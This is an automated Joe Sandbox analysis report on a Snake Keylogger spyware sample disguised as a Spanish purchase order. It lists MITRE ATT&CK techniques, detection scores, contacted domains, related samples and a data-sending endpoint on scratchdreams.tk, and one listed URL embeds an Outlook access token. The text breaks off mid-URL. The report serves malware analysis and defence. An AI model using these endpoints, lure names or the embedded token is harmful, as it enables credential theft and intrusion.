Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	12 Registry Run Keys / Startup Folder	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NUEVA ORDEN DE COMPRAsxlx..exe	66%	Virustotal		Browse
NUEVA ORDEN DE COMPRAsxlx..exe	83%	ReversingLabs	Win64.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	2%	Virustotal	Browse
scratchdreams.tk	18%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://reallyfreegeoip.org/xml/8.46.123.175H	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/8.46.123.175	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.175x	0%	Avira URL Cloud	safe
http://crl.micro7	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	16%	Virustotal		Browse
https://scratchdreams.tk	18%	Virustotal		Browse
http://scratchdreams.tk	18%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	2%, Virustotal, Browse	unknown
scratchdreams.tk	188.114.97.3	true	false	18%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.175	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://reallyfreegeoip.org/xml/8.46.123.175H	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.15.dr	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6	powershell.exe, 0000000D.00000002.1423330809.0000000004341000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1423330809.0000000004498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1450479614.000000000741A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.1447364393.00000000053B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.175x	RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.1423330809.0000000004341000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micro7	powershell.exe, 0000000D.00000002.1450479614.0000000007434000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	RegSvcs.exe, 00000010.00000002.2537070598.0000000002C32000.00000004.00000800.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	scratchdreams.tk	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447914
Start date and time:	2024-05-27 12:19:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NUEVA ORDEN DE COMPRAsxlx..exe
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.expl.evad.winEXE@19/14@3/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 67% Number of executed functions: 328 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): watson.events.data.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollectorcommon.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target .exe, PID 8036 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:20:06	API Interceptor	32x Sleep call for process: powershell.exe modified
06:20:12	API Interceptor	1x Sleep call for process: WerFault.exe modified
06:20:18	API Interceptor	922778x Sleep call for process: RegSvcs.exe modified
12:20:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse	worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
	http://www.lnkfi.re/1moJNQoc/	Get hash	malicious	Unknown	Browse	cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
	http://twomancake.com	Get hash	malicious	Unknown	Browse	twomancake.com/
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	fleur-de-lis.sbs/jhgfd
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/YXcuqXy
	LHER000698175.xls	Get hash	malicious	Unknown	Browse	qr-in.com/JeYCrvM
	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	qr-in.com/RtWEZGi
	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php
	WRnJsnI1Zq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	objectiveci.top/pythonpacketGamebigloadprivateCentral.php
	http://hjkie5.pages.dev/	Get hash	malicious	Unknown	Browse	hjkie5.pages.dev/
193.122.6.168	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	contract.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z46PEDIDODECOMPRAURGENTE___F__D__P___.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z13FAT9654578987.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	001_080524_321342344doc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	doc.25.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	seznam objedn#U00e1vek-405598204.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1d#U0422.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z25BNjJ88767909876500h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	FACT45780987600h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	utradvices.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	BANKOVN#U00cd SWIFT pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Nw5bRIz4A0.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	Nw5bRIz4A0.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	doc.25.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	seznam objedn#U00e1vek-405598204.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	1d#U0422.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z25BNjJ88767909876500h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	FACT45780987600h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
scratchdreams.tk	doc.25.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	seznam objedn#U00e1vek-405598204.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	1d#U0422.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z25BNjJ88767909876500h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	FACT45780987600h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	utradvices.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	BANKOVN#U00cd SWIFT pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	file.exe	Get hash	malicious	SystemBC	Browse	140.238.133.27
	Nw5bRIz4A0.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	doc.25.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	seznam objedn#U00e1vek-405598204.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	1d#U0422.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	https://www.google.com.bh/url?hl=en&q=https://www.google.com.bh/url?hl%3Den%26q%3Dhttp://www.google.com/amp/www.google.com/amp/www.google.com/amp/%252574%252569%25256E%252579%252575%252572%25256C%25252E%252563%25256F%25256D%25252F%25256D%252576%252574%252575%252575%252566%252537%252533%26source%3Dgmail%26ust%3D1716286979743000%26usg%3DAOvVaw0kIG15Hao_4RLWdhQSbrTj&source=gmail&ust=1716287016979000&usg=AOvVaw2OvZXU7t2_QCy0TjxskKGn	Get hash	malicious	Unknown	Browse	192.29.14.118
	z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	http://www.intraship-dhl.co.uk	Get hash	malicious	Phisher	Browse	129.148.158.16
	FACT45780987600h.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
CLOUDFLARENETUS	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	172.67.190.203
	proforma invoice.bit.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	INV 0983 OSY 240524_PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ZAMOWIEN.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	172.67.190.76
	https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzNDQtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://docsend.com/view/qqrrvyqndwsixgqg	Get hash	malicious	Phisher	Browse	172.67.137.213
	https://url.za.m.mimecastprotect.com/s/dkSWC8qYY1u9oZr4unuoBl?domain=t.co	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://mary-7.ispring.com/app/preview/df7e6170-1759-11ef-9d84-1e3de37e0836	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://mary-7.ispring.com/app/preview/df7e6170-1759-11ef-9d84-1e3de37e0836	Get hash	malicious	Unknown	Browse	188.114.96.3
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
CLOUDFLARENETUS	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	172.67.190.203
	proforma invoice.bit.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	INV 0983 OSY 240524_PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ZAMOWIEN.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	172.67.190.76
	https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzND